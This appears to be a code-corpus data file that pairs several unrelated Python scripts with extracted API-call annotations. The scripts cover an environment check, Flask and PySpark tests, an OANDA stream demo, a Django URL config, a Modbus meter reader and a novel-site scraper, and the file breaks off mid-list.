((17006, 17046), 'sklearn.utils.validation.check_random_state', 'check_random_state_sklearn', (['random_state'], {}), '(random_state)\n', (17032, 17046), True, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((20312, 20343), 'numpy.any', 'np.any', (['(indices >= A.shape[dim])'], {}), '(indices >= A.shape[dim])\n', (20318, 20343), True, 'import numpy as np\n'), ((25798, 25812), 'sklearn.utils.validation.check_array', 'check_array', (['X'], {}), '(X)\n', (25809, 25812), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((26056, 26074), 'sklearn.utils.validation.check_array', 'check_array', (['bound'], {}), '(bound)\n', (26067, 26074), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((27724, 27753), 'copy.deepcopy', 'copy.deepcopy', (['budget_manager'], {}), '(budget_manager)\n', (27737, 27753), False, 'import copy\n'), ((3193, 3210), 'numpy.array', 'np.array', (['classes'], {}), '(classes)\n', (3201, 3210), True, 'import numpy as np\n'), ((7401, 7463), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains negative cost entries."""'], {}), '("\'cost_matrix\' contains negative cost entries.")\n', (7414, 7463), False, 'import warnings\n'), ((7490, 7518), 'numpy.sum', 'np.sum', (['(cost_matrix_new != 0)'], {}), '(cost_matrix_new != 0)\n', (7496, 7518), True, 'import numpy as np\n'), ((7723, 7795), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains contains no non-zero cost entry."""'], {}), '("\'cost_matrix\' contains contains no non-zero cost entry.")\n', (7736, 7795), False, 'import warnings\n'), ((8085, 8163), 'warnings.warn', 'warnings.warn', (['"""\'cost_matrix\' contains non-zero cost 
entries on its diagonal."""'], {}), '("\'cost_matrix\' contains non-zero cost entries on its diagonal.")\n', (8098, 8163), False, 'import warnings\n'), ((14148, 14239), 'sklearn.utils.validation.check_array', 'check_array', (['y'], {'accept_sparse': '"""csr"""', 'force_all_finite': '(True)', 'ensure_2d': '(False)', 'dtype': 'None'}), "(y, accept_sparse='csr', force_all_finite=True, ensure_2d=False,\n dtype=None)\n", (14159, 14239), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14361, 14387), 'sklearn.utils.validation.column_or_1d', 'column_or_1d', (['y'], {'warn': '(True)'}), '(y, warn=True)\n', (14373, 14387), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14400, 14441), 'sklearn.utils.validation.assert_all_finite', 'assert_all_finite', (['y'], {'allow_nan': 'allow_nan'}), '(y, allow_nan=allow_nan)\n', (14417, 14441), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14665, 14681), 'numpy.ones', 'np.ones', (['y.shape'], {}), '(y.shape)\n', (14672, 14681), True, 'import numpy as np\n'), ((14971, 15016), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['y.T', 'sample_weight.T'], {}), '(y.T, sample_weight.T)\n', (14994, 15016), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((19826, 19863), 'numpy.any', 'np.any', (['(indices[i] >= A.shape[dim[i]])'], {}), '(indices[i] >= A.shape[dim[i]])\n', (19832, 19863), True, 'import numpy as np\n'), ((26412, 26432), 'numpy.nanmin', 'np.nanmin', (['X'], {'axis': '(0)'}), '(X, axis=0)\n', (26421, 26432), True, 
'import numpy as np\n'), ((26460, 26480), 'numpy.nanmax', 'np.nanmax', (['X'], {'axis': '(0)'}), '(X, axis=0)\n', (26469, 26480), True, 'import numpy as np\n'), ((27490, 27639), 'warnings.warn', 'warnings.warn', (['"""budgetmanager is already given such that the budget is not used. The given budget differs from the budget_managers budget."""'], {}), "(\n 'budgetmanager is already given such that the budget is not used. The given budget differs from the budget_managers budget.'\n )\n", (27503, 27639), False, 'import warnings\n'), ((7840, 7864), 'numpy.diag', 'np.diag', (['cost_matrix_new'], {}), '(cost_matrix_new)\n', (7847, 7864), True, 'import numpy as np\n'), ((18576, 18594), 'numpy.unique', 'np.unique', (['indices'], {}), '(indices)\n', (18585, 18594), True, 'import numpy as np\n'), ((18645, 18671), 'numpy.unique', 'np.unique', (['indices'], {'axis': '(0)'}), '(indices, axis=0)\n', (18654, 18671), True, 'import numpy as np\n'), ((18929, 18947), 'numpy.unique', 'np.unique', (['indices'], {}), '(indices)\n', (18938, 18947), True, 'import numpy as np\n'), ((18984, 19010), 'numpy.unique', 'np.unique', (['indices'], {'axis': '(0)'}), '(indices, axis=0)\n', (18993, 19010), True, 'import numpy as np\n'), ((26656, 26697), 'numpy.logical_or', 'np.logical_or', (['(bound[0] > X)', '(X > bound[1])'], {}), '(bound[0] > X, X > bound[1])\n', (26669, 26697), True, 'import numpy as np\n'), ((26712, 26777), 'warnings.warn', 'warnings.warn', (['"""`X` contains values not within range of `bound`."""'], {}), "('`X` contains values not within range of `bound`.')\n", (26725, 26777), False, 'import warnings\n'), ((20448, 20463), 'numpy.max', 'np.max', (['indices'], {}), '(indices)\n', (20454, 20463), True, 'import numpy as np\n'), ((19985, 20003), 'numpy.max', 'np.max', (['indices[i]'], {}), '(indices[i])\n', (19991, 20003), True, 'import numpy as np\n'), ((24386, 24401), 'inspect.signature', 'signature', (['func'], {}), '(func)\n', (24395, 24401), False, 'from inspect import 
Parameter, signature\n')]
|
# Python application to test miniconda data science installation
import math
import os
import sys
libs = ["numpy", "pandas", "matplotlib", "sklearn", "skimage", "cv2",
"sqlalchemy", "bokeh", "nltk", "missingno", "geopandas", "wordcloud",
"lightgbm", "scipy", "xgboost", "catboost", "keras"]
def main():
    """Run every environment check in a fixed order."""
    print("Please wait, testing Python environment....")
    checks = (test_is_python_35, test_libs, test_tensorflow, test_keras)
    for check in checks:
        check()
def test_libs():
    """Attempt to import each package in ``libs``, reporting OK/FAIL per name."""
    for lib_name in libs:
        try:
            __import__(lib_name)
        except ImportError:
            print("Testing {:s} -> FAIL".format(lib_name))
        else:
            print("Testing {:s} -> OK".format(lib_name))
def test_keras():
    """Report whether the ``keras`` package is importable."""
    try:
        import keras  # noqa: F401 -- imported only to probe availability
    except ImportError:
        print("Testing keras -> FAIL")
    else:
        print("Testing keras -> OK")
def test_tensorflow():
    """Report whether the ``tensorflow`` package is importable."""
    try:
        import tensorflow  # noqa: F401 -- imported only to probe availability
    except ImportError:
        print("Testing tensorflow -> FAIL")
    else:
        print("Testing tensorflow -> OK")
def test_is_python_35():
    """Check the interpreter version: exit(1) unless Python 3, warn below 3.5.

    Fixes: the original had an empty ``pass`` branch with an inverted guard,
    and an unreachable ``return None`` after ``sys.exit(1)``.
    """
    major = sys.version_info.major
    minor = sys.version_info.minor
    if major != 3:
        print("You are running Python {}, but we need Python {}.".format(major, 3))
        print("Stopping here.")
        sys.exit(1)
    if minor >= 5:
        print("Testing Python version-> py{}.{} OK".format(major, minor))
    else:
        print("Warning: You should be running Python 3.5 or newer, " +
              "you have Python {}.{}.".format(major, minor))
main()
|
[
"sys.exit"
] |
[((1304, 1315), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1312, 1315), False, 'import sys\n')]
|
"""
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/train -d '{"userName":"TEST1","dataset":[[-15, -57, 88, 50, 16, 83, 198, 16, -70],[202, -53, 140, 134, 0, 84, 165, -16, -15],[15, -67, 96, 108, 0, 79, 212, -16, -23],[16, -67, 126, 119, -15, 67, 258, -16, -16],[53, -65, 155, 59, 15, 65, 179, -16, 15],[56, -68, 104, 137, -16, 88, 382, 16, -70]], "dataset2":[[41, -47, 1065, -15, 85, 181, 892, 16, -15],[15, -15, 922, 164, 80, 488, 302, 67, 51],[448, 1770, 2118, 1348, 495, 117, 1286, 430, 633],[47, -34, 1405, 75, 49, 228, 1115, 89, 16],[550, 1080, 383, 321, 97, 350, 1420, 43, 1114],[89, 430, 1034, 97, 36, 112, 387, 57, 16]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/predict -d '{"userName":"DEMO1","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]}'
"""
"""
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/register -d '{"userName":"TEST1","dataset":[[-15, -57, 88, 50, 16, 83, 198, 16, -70],[202, -53, 140, 134, 0, 84, 165, -16, -15],[15, -67, 96, 108, 0, 79, 212, -16, -23],[16, -67, 126, 119, -15, 67, 258, -16, -16],[53, -65, 155, 59, 15, 65, 179, -16, 15],[56, -68, 104, 137, -16, 88, 382, 16, -70]], "dataset2":[[41, -47, 1065, -15, 85, 181, 892, 16, -15],[15, -15, 922, 164, 80, 488, 302, 67, 51],[448, 1770, 2118, 1348, 495, 117, 1286, 430, 633],[47, -34, 1405, 75, 49, 228, 1115, 89, 16],[550, 1080, 383, 321, 97, 350, 1420, 43, 1114],[89, 430, 1034, 97, 36, 112, 387, 57, 16]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/login -d '{"userName":"DEMO1","dataset":[[200,27,102,80,-36,80,579,66,21,61,208,71,-110]]}'
curl -i -X POST -H "Content-Type:application/json" http://localhost:5000/train -d '{"userName":"test3", "password":""}'
"""
import os
import sys
import unittest
import json
import logging
sys.path.append("../src")
import app
class FlaskAppTest(unittest.TestCase):
    """Exercises the Flask /register and /login endpoints end to end."""

    # Shared request body; key order matches the original inline literal,
    # so json.dumps produces an identical payload string.
    _PAYLOAD = {
        "userName": "DEMO1",
        "password": "<PASSWORD>",
        "dataset": [
            [200, 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110],
            [200, 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110],
        ],
    }

    def setUp(self):
        # Fresh test client for every test case.
        self.client = app.app.test_client()

    def tearDown(self):
        pass

    def test_register_login(self):
        """Register then log in with the same payload; both must return 200."""
        for endpoint in ('/register', '/login'):
            logging.debug("test_login:")
            response = self.client.post(endpoint,
                                        data=json.dumps(self._PAYLOAD),
                                        content_type='application/json',
                                        follow_redirects=True)
            self.assertEqual(response.status_code, 200)
if __name__ == '__main__':
    # Configure the app's logging before handing control to the unittest runner.
    app.init_log()
    unittest.main()
|
[
"sys.path.append",
"unittest.main",
"logging.debug",
"app.app.test_client",
"json.dumps",
"app.init_log"
] |
[((1851, 1876), 'sys.path.append', 'sys.path.append', (['"""../src"""'], {}), "('../src')\n", (1866, 1876), False, 'import sys\n'), ((2889, 2903), 'app.init_log', 'app.init_log', ([], {}), '()\n', (2901, 2903), False, 'import app\n'), ((2908, 2923), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2921, 2923), False, 'import unittest\n'), ((1973, 1994), 'app.app.test_client', 'app.app.test_client', ([], {}), '()\n', (1992, 1994), False, 'import app\n'), ((2077, 2105), 'logging.debug', 'logging.debug', (['"""test_login:"""'], {}), "('test_login:')\n", (2090, 2105), False, 'import logging\n'), ((2470, 2498), 'logging.debug', 'logging.debug', (['"""test_login:"""'], {}), "('test_login:')\n", (2483, 2498), False, 'import logging\n'), ((2169, 2372), 'json.dumps', 'json.dumps', (["{'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, 80, -36, \n 80, 579, 66, 21, 61, 208, 71, -110]]}"], {}), "({'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200,\n 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110]]})\n", (2179, 2372), False, 'import json\n'), ((2559, 2762), 'json.dumps', 'json.dumps', (["{'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, 80, -36, \n 80, 579, 66, 21, 61, 208, 71, -110]]}"], {}), "({'userName': 'DEMO1', 'password': '<PASSWORD>', 'dataset': [[200,\n 27, 102, 80, -36, 80, 579, 66, 21, 61, 208, 71, -110], [200, 27, 102, \n 80, -36, 80, 579, 66, 21, 61, 208, 71, -110]]})\n", (2569, 2762), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
"""Simple demo of streaming transaction data."""
from oandapyV20 import API
from oandapyV20.exceptions import V20Error, StreamTerminated
from oandapyV20.endpoints.transactions import TransactionsStream
from exampleauth import exampleAuth
# Read credentials from the local example config, then open a transaction stream.
accountID, access_token = exampleAuth()
api = API(access_token=access_token, environment="practice")
s = TransactionsStream(accountID=accountID)
MAXTRANS = 10
print("read from stream until {} transactions received".format(MAXTRANS))
try:
    n = 0
    # Print streamed transaction records until we have seen MAXTRANS of them.
    for R in api.request(s):
        print(R)
        n += 1
        if n > MAXTRANS:
            # Stops the stream; presumably surfaces as StreamTerminated below.
            s.terminate("max transactions received")
except StreamTerminated as e:
    # Normal exit path after terminate() is called.
    print("{}".format(e))
except V20Error as e:
    print("Error: {}".format(e))
|
[
"oandapyV20.API",
"exampleauth.exampleAuth",
"oandapyV20.endpoints.transactions.TransactionsStream"
] |
[((289, 302), 'exampleauth.exampleAuth', 'exampleAuth', ([], {}), '()\n', (300, 302), False, 'from exampleauth import exampleAuth\n'), ((309, 363), 'oandapyV20.API', 'API', ([], {'access_token': 'access_token', 'environment': '"""practice"""'}), "(access_token=access_token, environment='practice')\n", (312, 363), False, 'from oandapyV20 import API\n'), ((369, 408), 'oandapyV20.endpoints.transactions.TransactionsStream', 'TransactionsStream', ([], {'accountID': 'accountID'}), '(accountID=accountID)\n', (387, 408), False, 'from oandapyV20.endpoints.transactions import TransactionsStream\n')]
|
import unittest
import yaml
from pyspark.sql import *
from dataforj import schema
from test.test_samples import flow_simple, simple_yaml_text, flow_complex
city_yaml_text = '''
- name: city
tests:
- not_null
- accepted_values: ['Amsterdam', 'Dublin', 'Frankfurt']
'''
flag_yaml_text = '''
- name: flag
tests:
- not_null
'''
combined_yaml_text = f'{city_yaml_text}\n{flag_yaml_text}'
spark = SparkSession \
.builder \
.appName("Unit Test") \
.getOrCreate()
ut_step_df = spark.createDataFrame(
[
('Amsterdam', True),
('Dublin', False),
],
['city', 'flag']
)
ut_bad_city_df = spark.createDataFrame(
[
('Amsterdam', True),
('New York', False)
],
['city', 'flag']
)
ut_bad_flag_df = spark.createDataFrame(
[
('Amsterdam', True),
('New York', None)
],
['city', 'flag']
)
class SchemaTest(unittest.TestCase):
    """Unit tests for dataforj schema validation against Spark DataFrames.

    Fix: the class previously defined ``test_negative_accepted_values``
    twice; the second definition shadowed the first, so the city
    accepted-values negative test never ran. The second is renamed to
    ``test_negative_null`` to match its positive counterpart.
    """

    def test_schema_two_fields(self):
        '''Test to make sure two fields can be validated in the same YAML'''
        schema_yaml = yaml.safe_load(combined_yaml_text)
        schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)

    def test_positive_accepted_values(self):
        '''Valid city values must pass the accepted_values check.'''
        schema_yaml = yaml.safe_load(city_yaml_text)
        schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)

    def test_negative_accepted_values(self):
        '''A city outside the accepted list must raise with a precise message.'''
        schema_yaml = yaml.safe_load(city_yaml_text)
        with self.assertRaises(AssertionError) as excinfo:
            schema.check_schema_yaml('ut_bad_city_df', ut_bad_city_df, schema_yaml)
        self.assertEqual('Output of step [ut_bad_city_df] column [city] should only have values '
                         'in the accepted list [Amsterdam, Dublin, Frankfurt]. These values '
                         'were also found [\'New York\'].',
                         str(excinfo.exception))

    def test_positive_null(self):
        '''A flag column without nulls must pass the not_null check.'''
        schema_yaml = yaml.safe_load(flag_yaml_text)
        schema.check_schema_yaml('ut_step_df', ut_step_df, schema_yaml)

    def test_negative_null(self):
        '''A null flag value must raise with a precise message.'''
        schema_yaml = yaml.safe_load(flag_yaml_text)
        with self.assertRaises(AssertionError) as excinfo:
            schema.check_schema_yaml('ut_bad_flag_df', ut_bad_flag_df, schema_yaml)
        self.assertEqual('Output of step ut_bad_flag_df column flag should not be null.',
                         str(excinfo.exception))

    def test_check_schema(self):
        '''Test to make sure we can read in the YAML file from the example project'''
        schema.check_schema('ut_step_df', ut_step_df, 'example/schemas/filter_schema.yaml')
if __name__ == "__main__":
SchemaTest().test_check_schema()
|
[
"dataforj.schema.check_schema_yaml",
"dataforj.schema.check_schema",
"yaml.safe_load"
] |
[((1078, 1112), 'yaml.safe_load', 'yaml.safe_load', (['combined_yaml_text'], {}), '(combined_yaml_text)\n', (1092, 1112), False, 'import yaml\n'), ((1121, 1184), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (1145, 1184), False, 'from dataforj import schema\n'), ((1253, 1283), 'yaml.safe_load', 'yaml.safe_load', (['city_yaml_text'], {}), '(city_yaml_text)\n', (1267, 1283), False, 'import yaml\n'), ((1292, 1355), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (1316, 1355), False, 'from dataforj import schema\n'), ((1424, 1454), 'yaml.safe_load', 'yaml.safe_load', (['city_yaml_text'], {}), '(city_yaml_text)\n', (1438, 1454), False, 'import yaml\n'), ((1957, 1987), 'yaml.safe_load', 'yaml.safe_load', (['flag_yaml_text'], {}), '(flag_yaml_text)\n', (1971, 1987), False, 'import yaml\n'), ((1996, 2059), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_step_df"""', 'ut_step_df', 'schema_yaml'], {}), "('ut_step_df', ut_step_df, schema_yaml)\n", (2020, 2059), False, 'from dataforj import schema\n'), ((2128, 2158), 'yaml.safe_load', 'yaml.safe_load', (['flag_yaml_text'], {}), '(flag_yaml_text)\n', (2142, 2158), False, 'import yaml\n'), ((2570, 2657), 'dataforj.schema.check_schema', 'schema.check_schema', (['"""ut_step_df"""', 'ut_step_df', '"""example/schemas/filter_schema.yaml"""'], {}), "('ut_step_df', ut_step_df,\n 'example/schemas/filter_schema.yaml')\n", (2589, 2657), False, 'from dataforj import schema\n'), ((1526, 1597), 'dataforj.schema.check_schema_yaml', 'schema.check_schema_yaml', (['"""ut_bad_city_df"""', 'ut_bad_city_df', 'schema_yaml'], {}), "('ut_bad_city_df', ut_bad_city_df, schema_yaml)\n", (1550, 1597), False, 'from dataforj import schema\n'), ((2230, 2301), 'dataforj.schema.check_schema_yaml', 
'schema.check_schema_yaml', (['"""ut_bad_flag_df"""', 'ut_bad_flag_df', 'schema_yaml'], {}), "('ut_bad_flag_df', ut_bad_flag_df, schema_yaml)\n", (2254, 2301), False, 'from dataforj import schema\n')]
|
from datetime import datetime, timedelta
from typing import Union
from .models.file import UploadUrlModel
from .cache import Cache
def format_route_name(name: str) -> str:
    """Lowercase a route class name after stripping every "Route" substring.

    Parameters
    ----------
    name : str
        Route class name, e.g. ``"UploadRoute"``.

    Returns
    -------
    str
        ``name`` with all ``"Route"`` occurrences removed, lowercased.
    """
    stripped = name.replace("Route", "")
    return stripped.lower()
class UploadUrlCache:
    # In-memory, lazily-expiring cache of upload URL models, keyed by
    # bucket id (whole-file uploads) or bucket id + file id (part uploads).
    def __init__(self, bucket_id: str, file_id: str = None) -> None:
        """Used to handle cached upload URLs.

        Parameters
        ----------
        bucket_id : str
        file_id : str, optional
            by default None

        Notes
        -----
        If file_id passed Cache.upload_parts_urls is used
        instead of Cache.upload_urls.
        """
        if not file_id:
            self.upload_cache = Cache.upload_urls
            self.index = bucket_id
        else:
            self.upload_cache = Cache.upload_parts_urls
            self.index = bucket_id + file_id
    def find(self) -> Union[None, UploadUrlModel]:
        """Looks for a cached item, evicting it lazily if expired.

        Returns
        -------
        UploadUrlModel or None
            The cached model, or None when absent or past its expiry.
        """
        if self.index in self.upload_cache:
            if datetime.now() >= self.upload_cache[self.index]["expires"]:
                # Expired: drop the stale entry so callers fetch a fresh URL.
                self.upload_cache.pop(self.index, None)
            else:
                return self.upload_cache[self.index]["model"]
    def save(self, upload_model: UploadUrlModel) -> UploadUrlModel:
        """Saves upload model into cache.

        Parameters
        ----------
        upload_model : UploadUrlModel

        Returns
        -------
        UploadUrlModel
            The same model, returned for convenient chaining.
        """
        self.upload_cache[self.index] = {
            # 23h50m lifetime -- presumably just under the backend's 24h
            # upload-URL validity window; TODO confirm against the B2 API docs.
            "expires": datetime.now() + timedelta(hours=23, minutes=50),
            "model": upload_model
        }
        return upload_model
    def delete(self) -> None:
        """Deletes the upload entry out of the cache (no-op if absent).
        """
        self.upload_cache.pop(self.index, None)
def encode_name(name: str, encoding: str = "utf-8",
replace: bool = True) -> str:
"""Used to encode names correctly for b2.
Parameters
----------
name : str
encoding : str, optional
by default "utf-8"
replace : bool, optional
by default True
Returns
-------
str
"""
if replace:
name = name.replace(" ", "-")
return name.encode(encoding).decode(encoding)
|
[
"datetime.datetime.now",
"datetime.timedelta"
] |
[((1184, 1198), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1196, 1198), False, 'from datetime import datetime, timedelta\n'), ((1702, 1716), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1714, 1716), False, 'from datetime import datetime, timedelta\n'), ((1719, 1750), 'datetime.timedelta', 'timedelta', ([], {'hours': '(23)', 'minutes': '(50)'}), '(hours=23, minutes=50)\n', (1728, 1750), False, 'from datetime import datetime, timedelta\n')]
|
from django.urls import path
from . import views
from os import name
from django.conf.urls.static import static
from django.conf import settings
# Gallery URL routes: landing page, full gallery, search, and single image.
urlpatterns=[
    path('',views.welcome,name ='welcome'),
    path('gallery/',views.pictures,name='pictures'),
    path('search/', views.search_results, name='search_results'),
    path('picture/<int:image_id>/',views.picture,name='imageid'),
]
if settings.DEBUG:
    # Serve uploaded media through Django itself in development only.
    urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"django.conf.urls.static.static",
"django.urls.path"
] |
[((164, 203), 'django.urls.path', 'path', (['""""""', 'views.welcome'], {'name': '"""welcome"""'}), "('', views.welcome, name='welcome')\n", (168, 203), False, 'from django.urls import path\n'), ((208, 257), 'django.urls.path', 'path', (['"""gallery/"""', 'views.pictures'], {'name': '"""pictures"""'}), "('gallery/', views.pictures, name='pictures')\n", (212, 257), False, 'from django.urls import path\n'), ((261, 321), 'django.urls.path', 'path', (['"""search/"""', 'views.search_results'], {'name': '"""search_results"""'}), "('search/', views.search_results, name='search_results')\n", (265, 321), False, 'from django.urls import path\n'), ((327, 389), 'django.urls.path', 'path', (['"""picture/<int:image_id>/"""', 'views.picture'], {'name': '"""imageid"""'}), "('picture/<int:image_id>/', views.picture, name='imageid')\n", (331, 389), False, 'from django.urls import path\n'), ((429, 490), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (435, 490), False, 'from django.conf.urls.static import static\n')]
|
import mp_modbus_master as mmm
import time
import struct
# RTU master on UART2; pin numbers suggest an ESP32-style MicroPython board
# -- TODO confirm against the target hardware.
d1 = mmm.modbus_rtu_master(uart_no=2, parity=0, tx_pin=12, rx_pin=13, en_pin=32)
# Register map of the energy meter: holding-register address, decoded type,
# scaling divisor ("gain") and display unit per measurement.
l = {
    "U" : {"register": 305, "desc": "Voltage", "type": "uint16", "gain": 100, "unit": "V"},
    "I" : {"register": 313, "desc": "Current", "type": "int32", "gain": 1000, "unit": "A"},
    "Power" : {"register": 320, "desc": "Power", "type": "int32", "gain": 1000, "unit": "kW"},
    "Power_R" : {"register": 328, "desc": "Reactive Power", "type": "int32", "gain": 1000, "unit": "VA"},
    "Power_A" : {"register": 336, "desc": "Apparent Power", "type": "int32", "gain": 1000, "unit": "VA"},
    "Energie_Total_aktiv" : {"register": 40960, "desc": "Total Energy", "type": "int32", "gain": 100, "unit": "kWh"},
}
# Poll every mapped register three times, one second apart.
for i in range(3):
    time.sleep(1)
    for e in l:
        try:
            #time.sleep(0.1)
            #print(e)
            # Drain/echo any pending UART bytes before issuing the request.
            print(d1.uart.read(10))
            if l[e]["type"] == "uint16":
                # NOTE(review): uint16 path uses the *_async variant while the
                # int32 path uses the blocking call -- confirm this is intended.
                f = d1.read_holding_registers_async(l[e]["register"], 1)
                #print(f)
                # NOTE(review): ">h" is a *signed* 16-bit unpack despite the
                # "uint16" label; ">I" below is unsigned 32-bit.
                v = struct.unpack(">h", f.data)[0]/l[e]["gain"]
            if l[e]["type"] == "int32":
                f = d1.read_holding_registers(l[e]["register"], 2)
                #print(f)
                v = struct.unpack(">I", f.data)[0]/l[e]["gain"]
            print("{}: {} {}".format(e, v, l[e]["unit"]))
        except:
            # Bare except: any failure (timeout, unpack error, NameError on v)
            # is swallowed after a short pause.
            time.sleep(0.1)
            print("ERROR")
# Flush whatever is left in the UART receive buffer.
print(d1.uart.read(10))
while d1.uart.any() > 0:
    print(d1.uart.read(10))
|
[
"mp_modbus_master.modbus_rtu_master",
"struct.unpack",
"time.sleep"
] |
[((63, 138), 'mp_modbus_master.modbus_rtu_master', 'mmm.modbus_rtu_master', ([], {'uart_no': '(2)', 'parity': '(0)', 'tx_pin': '(12)', 'rx_pin': '(13)', 'en_pin': '(32)'}), '(uart_no=2, parity=0, tx_pin=12, rx_pin=13, en_pin=32)\n', (84, 138), True, 'import mp_modbus_master as mmm\n'), ((896, 909), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (906, 909), False, 'import time\n'), ((1521, 1536), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1531, 1536), False, 'import time\n'), ((1194, 1221), 'struct.unpack', 'struct.unpack', (['""">h"""', 'f.data'], {}), "('>h', f.data)\n", (1207, 1221), False, 'import struct\n'), ((1391, 1418), 'struct.unpack', 'struct.unpack', (['""">I"""', 'f.data'], {}), "('>I', f.data)\n", (1404, 1418), False, 'import struct\n')]
|
import copy
import re
import requests
import urllib.parse
from bs4 import BeautifulSoup
from typing import List
try:
import basesite
except (ModuleNotFoundError, ImportError) as e:
from . import basesite
class SoxsSite(basesite.BaseSite):
    """Scraper for the soxs.cc web-novel site (search, chapter list, content)."""
    def __init__(self):
        # Site metadata registered with the base class; strings are the site's
        # Chinese display names and must stay as-is.
        self.site_info = basesite.SiteInfo(
            type='网络小说',
            statue='上线版本',
            url='https://www.soxs.cc',
            name='搜小说',
            brief_name='搜小说',
            version='1.1',
            max_threading_number=50,
        )
        super().__init__(self.site_info)
        self.base_url = 'https://www.soxs.cc'
        self.encoding = 'utf-8'
        self.search_url = 'https://www.soxs.cc/search.html'
        # One shared session for search/chapter-list requests.
        self.session = requests.session()
    @basesite.print_in_out
    def get_books(self, search_info: str) -> List[basesite.Book]:
        """Search the site for `search_info`; return matching Book objects
        (empty list on request failure or no results)."""
        r = self.try_post_url(self.session, url=self.search_url, try_timeout=5,
                              params=f'searchtype=all&searchkey={urllib.parse.quote(search_info)}')
        if r is None:
            return []
        soup = BeautifulSoup(r.content, 'html.parser')
        book_tag_list = soup.select('div.novelslist2 > ul > li')
        # First <li> is the table header row, hence the -1 / [1:] below.
        book_num = len(book_tag_list) - 1
        if book_num == 0:
            return []
        search_book_results = []
        book_soup_list = book_tag_list[1:]
        for book_soup in book_soup_list:
            # Column spans: [1]=title link, [2]=latest chapter, [3]=author,
            # [4]=update time (inferred from usage below).
            span_list = book_soup.findAll('span')
            book_url = self.base_url + span_list[1].find('a').attrs['href']
            book_name = span_list[1].find('a').text
            book_author = span_list[3].text
            book_brief = f"最新章节:{span_list[2].find('a').text} 更新时间:{span_list[4].text.strip()}"
            book = basesite.Book(site=self, url=book_url, name=book_name, author=book_author,
                                 brief=book_brief)
            search_book_results.append(book)
        return search_book_results
    @basesite.print_in_out
    def get_chapters(self, book: basesite.Book) -> List[basesite.Chapter]:
        """Fetch a book's page and return its chapter list (empty on failure)."""
        r = self.try_get_url(self.session, book.url)
        if r is None:
            return []
        soup = BeautifulSoup(r.content, 'html.parser')
        chapter_soup_list = soup.select('div.caption + div dd a')
        chapters = [basesite.Chapter(site=self,
                                     url=self.base_url + chapter.attrs['href'],
                                     title=chapter.text)
                    for chapter in chapter_soup_list]
        return chapters
    def get_chapter_content(self, chapter: basesite.Chapter) -> str:
        """Download one chapter's text, stripping the site's ad/footer lines.

        Uses a deep-copied session -- presumably for thread safety, since
        max_threading_number is 50 (TODO confirm).
        """
        session = copy.deepcopy(self.session)
        r = self.try_get_url(session, chapter.url)
        session.close()
        if r is None:
            # Failure placeholder text ("download failed") shown to the user.
            return f'{chapter.title}\r\n下载失败'
        soup = BeautifulSoup(r.content, 'html.parser')
        content = soup.select_one('div.content').text
        # Remove the in-text advertising line, then truncate at the
        # "latest chapter address" footer if present.
        content2 = re.sub(r"您可以在百度.+查找最新章节!", "", content)
        if m := re.search(r"\w+最新章节地址:https://www.soxs.cc", content2):
            content2 = content2[:m.start()].strip()
        # title = chapter.title if chapter.title.startswith("第") else f"第{chapter.title}"
        # content3 = f'\r\n{title}\r\n{content2.strip()}'
        return content2
    def save_chapter(self, chapter, filename):
        """Write one chapter's content to `filename` using the site encoding."""
        content = self.get_chapter_content(chapter)
        with open(filename, 'w', encoding=self.encoding) as f:
            f.write(content)
|
[
"requests.session",
"copy.deepcopy",
"basesite.Chapter",
"basesite.Book",
"re.search",
